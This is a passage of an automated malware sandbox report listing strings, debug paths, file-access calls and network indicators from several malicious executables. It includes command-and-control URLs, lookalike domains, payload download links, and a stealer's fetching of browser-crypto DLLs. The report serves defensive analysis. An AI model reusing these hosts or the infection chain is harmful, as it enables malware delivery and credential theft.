Source: Binary string: Loader.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: EfiGuardDxe.pdb7 source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp
Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.0000000000391000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000391000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000CD1000.00000040.00000001.01000000.00000024.sdmp
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: `K_lib.dll.pdb@+ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000C7A000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003599000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: .exe.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb@+ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmp
                    Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: `K_lib.dll.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Unable to locate the .pdb file in this location source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: The module signature does not match with .pdb signature. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: .pdb.dbg source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: '(EfiGuardDxe.pdbx source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: symsrv.pdbGCTL source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000C7A000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003599000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: or you do not have access permission to the .pdb location. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: EfiGuardDxe.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: .exe.pdb@ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb@ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.0000000000391000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000391000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000CD1000.00000040.00000001.01000000.00000024.sdmp
                    Source: Binary string: dbghelp.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: dbghelp.pdbGCTL source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00452A60 FindFirstFileA,GetLastError,15_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,15_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,15_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,15_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00462750 FindFirstFileA,FindNextFileA,FindClose,15_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,15_2_00463CDC
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe | Code function: 21_2_00408123 FindFirstFileA,FindClose,21_2_00408123
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe | Code function: 21_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,21_2_004085B8
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe | Code function: 21_2_0040342B FindFirstFileA,21_2_0040342B
                    Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                    Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\
                    Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
                    Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                    Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\
                    Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\

                    Networking

                    Source: Malware configuration extractor | URLs: http://185.172.128.145/3cd2b41cbde8fc9c.php
                    Source: Malware configuration extractor | URLs: ddtwcxy.info
                    Source: Malware configuration extractor | URLs: http://trad-einmyus.com/index.php
                    Source: Malware configuration extractor | URLs: http://tradein-myus.com/index.php
                    Source: Malware configuration extractor | URLs: http://trade-inmyus.com/index.php
                    Source: Yara match File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: unknown Network traffic detected: IP country count 23
                    Source: Joe Sandbox View IP Address: 93.171.243.253 93.171.243.253
                    Source: Joe Sandbox View IP Address: 212.110.188.202 212.110.188.202
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe Code function: 17_2_009B78A7 Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,_free,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,_free, 17_2_009B78A7
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmp String found in binary or memory: c. Facebook Messenger: A messaging service provided by Facebook, Inc., Meta Platforms Ireland Ltd. or related companies, depending on where you are accessing their services. Terms of use are available at https://www.facebook.com/legal/terms; and equals www.facebook.com (Facebook)
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000360A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://15.204.49.148
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://15.204.49.148/files/Silent.e
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003492000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000346F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003494000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003295000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003482000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://15.204.49.148/files/Silent.exe
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://15.204.49.148/files/Silent.exe4kL
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.00000000038DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://15.204.498:
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.00000000037C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.172.128
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.00000000034AF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003494000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.126
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003492000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000346F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003295000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003482000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.126/InstallSetup7.exe
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.0000000003492000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003494000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.126/InstallSetup7.exe4kL
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp, syncUpd.exe, 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.145
                    Source: syncUpd.exe, 00000016.00000002.3370913149.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.145/
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp, syncUpd.exe, 00000016.00000002.3389892346.00000000009D2000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3370913149.00000000006C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/freebl3.dll
                    Source: syncUpd.exe, 00000016.00000002.3370913149.00000000006C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/freebl3.dll_R
                    Source: syncUpd.exe, 00000016.00000002.3389892346.00000000009D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/freebl3.dlliq
                    Source: syncUpd.exe, 00000016.00000002.3389892346.00000000009D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/freebl3.dllyq
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/mozglue.dll
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/msvcp140.dll
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/msvcp140.dllGX
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/nss3.dll
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/nss3.dllera
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/softokn3.dll
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/softokn3.dllGX
                    Source: syncUpd.exe, 00000016.00000002.3370913149.00000000006C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/sqlite3.dll
